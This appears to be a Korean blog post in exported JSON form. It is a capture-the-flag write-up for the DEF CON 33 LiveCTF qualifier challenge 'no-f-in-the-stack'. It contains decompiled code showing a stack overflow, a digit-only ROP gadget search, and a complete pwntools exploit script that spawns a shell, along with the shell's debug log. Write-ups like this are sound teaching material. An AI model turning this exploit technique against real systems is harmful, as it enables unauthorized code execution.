{"id":3390,"date":"2025-04-24T03:22:29","date_gmt":"2025-04-23T18:22:29","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3390"},"modified":"2025-04-24T03:22:31","modified_gmt":"2025-04-23T18:22:31","slug":"livectf-defcon33-qualsno-f-in-the-stack","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3390","title":{"rendered":"[LiveCTF-DEFCON33-Quals]no-f-in-the-stack"},"content":{"rendered":"\n<p>\uce5c\uad6c \uad8c\uc720\ub85c \ud480\uc5b4\ubd04. <br>\uc0c8\ub85c\uc6b4 \uc0ac\uace0 \ubc29\ud5a5\uacfc \uc2dc\uac01\uc744 \ubc14\ub77c\ubcfc \uc218 \uc788\uc5b4 \uc88b\uc558\uc74c.<\/p>\n\n\n\n<p>Thanks, \ud83e\udd54<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">checksec<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@64a54bd8db27:~\/study\/LiveCTF-DEFCON33\/qualifiers\/challenges\/no-f-in-the-stack\/challenge\/build$ checksec .\/challenge_real\n[*] '\/home\/ubuntu\/study\/LiveCTF-DEFCON33\/qualifiers\/challenges\/no-f-in-the-stack\/challenge\/build\/challenge_real'\n    Arch:       amd64-64-little\n    RELRO:      No RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    SHSTK:      Enabled\n    IBT:        Enabled\n    Stripped:   No\n    Debuginfo:  Yes<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Decompiled-src \/ Analysis<\/h3>\n\n\n\n<p><code>uintptr_t stack[3];<\/code> \uc73c\ub85c \uc9c0\uc815\ub418\uc788\ub294\ub370, i\uac00 1000\ubc88\uae4c\uc9c0 \uacc4\uc18d \uc99d\uac00\ud558\uba74\uc11c \uc8fc\uc18c\ub97c \uc785\ub825\ubc1b\uc74c.<br>\u2192 BOF \ucde8\uc57d\uc810 \ubc1c\uc0dd<\/p>\n\n\n\n<p>\ubc1b\uc740 \uc8fc\uc18c\uac00 0\uc774\uba74, for \ub8e8\ud504\ubb38 \uc885\ub8cc.<\/p>\n\n\n\n<p>\uc8fc\uc18c\ub97c 10\uc9c4\uc218\ub85c \uc785\ub825\ubc1b\uc740 \ud6c4, \ub2e4\uc2dc \uadf8 \ubb38\uc790\uc5f4\uc744 16\uc9c4\uc218\ub85c \ubcc0\ud658\uc2dc\ucf1c <code>stack[i]<\/code>\uc5d0 \uc800\uc7a5\ud568.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  int v3; \/\/ edx\n  int v4; \/\/ ecx\n  int v5; \/\/ r8d\n  int v6; \/\/ r9d\n  int v7; \/\/ edx\n  int v8; \/\/ ecx\n  int v9; \/\/ r8d\n  int v10; \/\/ r9d\n  int v11; \/\/ r8d\n  int v12; \/\/ r9d\n  int v13; \/\/ r8d\n  int v14; \/\/ r9d\n  char v16; \/\/ [rsp+0h] [rbp-60h]\n  char v17; \/\/ [rsp+0h] [rbp-60h]\n  char v18; \/\/ [rsp+0h] [rbp-60h]\n  char v19; \/\/ [rsp+0h] [rbp-60h]\n  char printed_addr[16]; \/\/ [rsp+20h] [rbp-40h] BYREF\n  uintptr_t addr; \/\/ [rsp+38h] [rbp-28h] BYREF\n  uintptr_t stack[3]; \/\/ [rsp+40h] [rbp-20h] BYREF\n  int i; \/\/ [rsp+5Ch] [rbp-4h]\n\n  init();\n  for ( i = 0; i &lt;= 999; ++i )\n  {\n    printf((unsigned int)\"Addr pls: \", (_DWORD)argv, v3, v4, v5, v6, v16);\n    addr = 0;\n    _isoc23_scanf((unsigned int)\"%lu\", (unsigned int)&amp;addr, v7, v8, v9, v10, v17);\n    if ( !addr )\n      break;\n    memset(printed_addr, 0, sizeof(printed_addr));\n    sprintf((unsigned int)printed_addr, (unsigned int)\"%lu\", addr, (unsigned int)\"%lu\", v11, v12, v18);\n    argv = (const char **)\"%lx\";\n    _isoc23_sscanf(\n      (unsigned int)printed_addr,\n      (unsigned int)\"%lx\",\n      (unsigned int)&amp;stack[i],\n      (unsigned int)\"%lx\",\n      v13,\n      v14,\n      v19);\n    if ( !stack[i] )\n      break;\n  }\n  return 0;\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Blah<\/h3>\n\n\n\n<p><code>system(\u201d\u201d)<\/code>\uc744 \ud638\ucd9c\ud558\ub294 \ud568\uc218.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.text:0000000000401905 ; =============== S U B R O U T I N E =======================================\n.text:0000000000401905\n.text:0000000000401905 ; Attributes: bp-based frame\n.text:0000000000401905\n.text:0000000000401905 ; void __cdecl blah()\n.text:0000000000401905                 public blah\n.text:0000000000401905 blah            proc near\n.text:0000000000401905 ; __unwind {\n.text:0000000000401905                 endbr64\n.text:0000000000401909                 push    rbp\n.text:000000000040190A                 mov     rbp, rsp\n.text:000000000040190D                 lea     rax, unk_4A002C\n.text:0000000000401914                 mov     rdi, rax\n.text:0000000000401917                 call    system\n.text:000000000040191C                 nop\n.text:000000000040191D                 pop     rbp\n.text:000000000040191E                 retn\n...\n.rodata:00000000004A002C unk_4A002C      db    0<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Solution<\/h3>\n\n\n\n<p>\uc2e4\uc81c\ub860 \uc2a4\ud0dd \uce74\ub098\ub9ac\uac00 main \ud568\uc218\uc5d0 \uc801\uc6a9\ub418\uc788\uc9c0 \uc54a\uc544 RET\ub97c \ub36e\uc5b4 RIP \ucee8\ud2b8\ub864 \uac00\ub2a5\ud568. <br>\uc911\uc694\ud55c \uc810\uc740 \uc785\ub825\ubc1b\ub294 \uc8fc\uc18c\ub97c \uc2a4\ud0dd\uc5d0 16\uc9c4\uc218 \uac12\uc73c\ub85c \uc800\uc7a5\ud558\ub294\ub370,<br><code>%lu<\/code> 10\uc9c4\uc218\ub85c \ucca8\uc5d0 \uc785\ub825\ubc1b\uae30\uc5d0 \uc54c\ud30c\ubcb3\uc774 \ub4e4\uc5b4\uac00\uba74 \uc548\ub428.<\/p>\n\n\n\n<p>\uc22b\uc790\ub85c\ub9cc \uad6c\uc131\ub41c \uac00\uc82f\uc744 \ucc3e\ub294 \uba85\ub839\uc5b4.<\/p>\n\n\n\n<p><code>ROPgadget --binary .\/challenge_real > gadgets.txt<\/code><br><code>grep -E '^0x[0-9]+ :' gadgets.txt > gadgets2.txt<\/code><\/p>\n\n\n\n<p>\/bin\/sh \uc8fc\uc18c\ub97c 10\uc9c4\uc218\ub85c \uc798 \uc77d\uac8c\ub054 2\uac1c\ub85c \ucabc\uac20\ub2e4\uc74c, \uc544\ub798 3\uac00\uc9c0\uc758 \uac00\uc82f\uc744 \uc870\ud569\ud574 ROP chain\uc73c\ub85c \uc258 \ud68d\ub4dd \uac00\ub2a5\ud558\uc600\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">divided = \"490060\"\ndivided2 = \"10499\"\n\npop_rdi_pop_rbp_ret = \"0000000000402218\"\nadd_rax_rdi_ret = \"0000000000471885\"\nmov_rdi_rax_system = \"0000000000401914\"<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\ncontext.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\n# p = remote(\"127.0.0.1\", 1337)\np = process(\".\/challenge_real\")\ne = ELF('.\/challenge_real',checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims, drop=True: p.recvuntil(delims, drop)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\n\npop_rdi_pop_rbp_ret = \"0000000000402218\"\nadd_rax_rdi_ret = \"0000000000471885\"\nmov_rdi_rax_system = \"0000000000401914\"\n\nbin_sh = 0x00000000004A04F9\ndivided = \"490060\"\ndivided2 = \"10499\"\n\n# >>> hex(0x490060 + 0x10499)\n# '0x4a04f9'\n\nsla(b\"Addr pls: \", b\"1010101041424344\")\nsla(b\"Addr pls: \", b\"2020202041424344\")\nsla(b\"Addr pls: \", b\"3030303041424344\")\n\nsla(b\"Addr pls: \", b\"441424344\")    #4 -> RET; $rbp+8, \n\n#rax = 0\nsla(b\"Addr pls: \", pop_rdi_pop_rbp_ret.encode('utf-8'))\nsla(b\"Addr pls: \", divided.encode('utf-8')) #set rdi\nsla(b\"Addr pls: \", b\"4040404041424344\") #set rbp\nsla(b\"Addr pls: \", add_rax_rdi_ret.encode('utf-8'))\n\n#rax = 0x490060\nsla(b\"Addr pls: \", pop_rdi_pop_rbp_ret.encode('utf-8'))\nsla(b\"Addr pls: \", divided2.encode('utf-8')) #set rdi\nsla(b\"Addr pls: \", b\"5050505041424344\") #set rbp\nsla(b\"Addr pls: \", add_rax_rdi_ret.encode('utf-8'))\n\n#rax = 0x490060 + 0x10499 = 0x4a04f9 ('\/bin\/sh')\nsla(b\"Addr pls: \", mov_rdi_rax_system.encode('utf-8'))\nsla(b\"Addr pls: \", b\"0\")\n\np.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@64a54bd8db27:~\/study\/LiveCTF-DEFCON33\/qualifiers\/challenges\/no-f-in-the-stack\/challenge\/build$ python3 solve.py\n[+] Starting local process '.\/challenge_real' argv=[b'.\/challenge_real'] : pid 1967\n[DEBUG] '\/home\/ubuntu\/study\/LiveCTF-DEFCON33\/qualifiers\/challenges\/no-f-in-the-stack\/challenge\/build\/challenge_real' is statically linked, skipping GOT\/PLT symbols\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'1010101041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'2020202041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'3030303041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0xa bytes:\n    b'441424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000402218\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x7 bytes:\n    b'490060\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'4040404041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000471885\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000402218\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x6 bytes:\n    b'10499\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'5050505041424344\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000471885\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x11 bytes:\n    b'0000000000401914\\n'\n[DEBUG] Received 0xa bytes:\n    b'Addr pls: '\n[DEBUG] Sent 0x2 bytes:\n    b'0\\n'\n[*] Switching to interactive mode\n$ id\n[DEBUG] Sent 0x3 bytes:\n    b'id\\n'\n[DEBUG] Received 0x36 bytes:\n    b'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\\n'\nuid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)\n$ whoami\n[DEBUG] Sent 0x7 bytes:\n    b'whoami\\n'\n[DEBUG] Received 0x7 bytes:\n    b'ubuntu\\n'\nubuntu\n$ ls\n[DEBUG] Sent 0x3 bytes:\n    b'ls\\n'\n[DEBUG] Received 0x57 bytes:\n    b'challenge\\tcore\\t     gadgets2.txt  na\\n'\n    b'challenge_real\\tgadgets.txt  libc.so.6\\t   solve.py\\n'\nchallenge\tcore\t     gadgets2.txt  na\nchallenge_real\tgadgets.txt  libc.so.6\t   solve.py\n$  <\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\uce5c\uad6c \uad8c\uc720\ub85c \ud480\uc5b4\ubd04. \uc0c8\ub85c\uc6b4 \uc0ac\uace0 \ubc29\ud5a5\uacfc \uc2dc\uac01\uc744 \ubc14\ub77c\ubcfc \uc218 \uc788\uc5b4 \uc88b\uc558\uc74c. Thanks, \ud83e\udd54 checksec Decompiled-src \/ Analysis uintptr_t stack[3]; \uc73c\ub85c \uc9c0\uc815\ub418\uc788\ub294\ub370, i\uac00 1000\ubc88\uae4c\uc9c0 \uacc4\uc18d \uc99d\uac00\ud558\uba74\uc11c \uc8fc\uc18c\ub97c \uc785\ub825\ubc1b\uc74c.\u2192 BOF \ucde8\uc57d\uc810 \ubc1c\uc0dd \ubc1b\uc740 \uc8fc\uc18c\uac00 0\uc774\uba74, for \ub8e8\ud504\ubb38 \uc885\ub8cc. \uc8fc\uc18c\ub97c 10\uc9c4\uc218\ub85c \uc785\ub825\ubc1b\uc740 \ud6c4, \ub2e4\uc2dc \uadf8 \ubb38\uc790\uc5f4\uc744 16\uc9c4\uc218\ub85c \ubcc0\ud658\uc2dc\ucf1c stack[i]\uc5d0 \uc800\uc7a5\ud568. Blah system(\u201d\u201d)\uc744 \ud638\ucd9c\ud558\ub294 \ud568\uc218. Solution \uc2e4\uc81c\ub860 \uc2a4\ud0dd \uce74\ub098\ub9ac\uac00&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3390\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">[LiveCTF-DEFCON33-Quals]no-f-in-the-stack<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25],"class_list":["post-3390","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3390","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3390"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3390\/revisions"}],"predecessor-version":[{"id":3391,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3390\/revisions\/3391"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3390"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3390"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}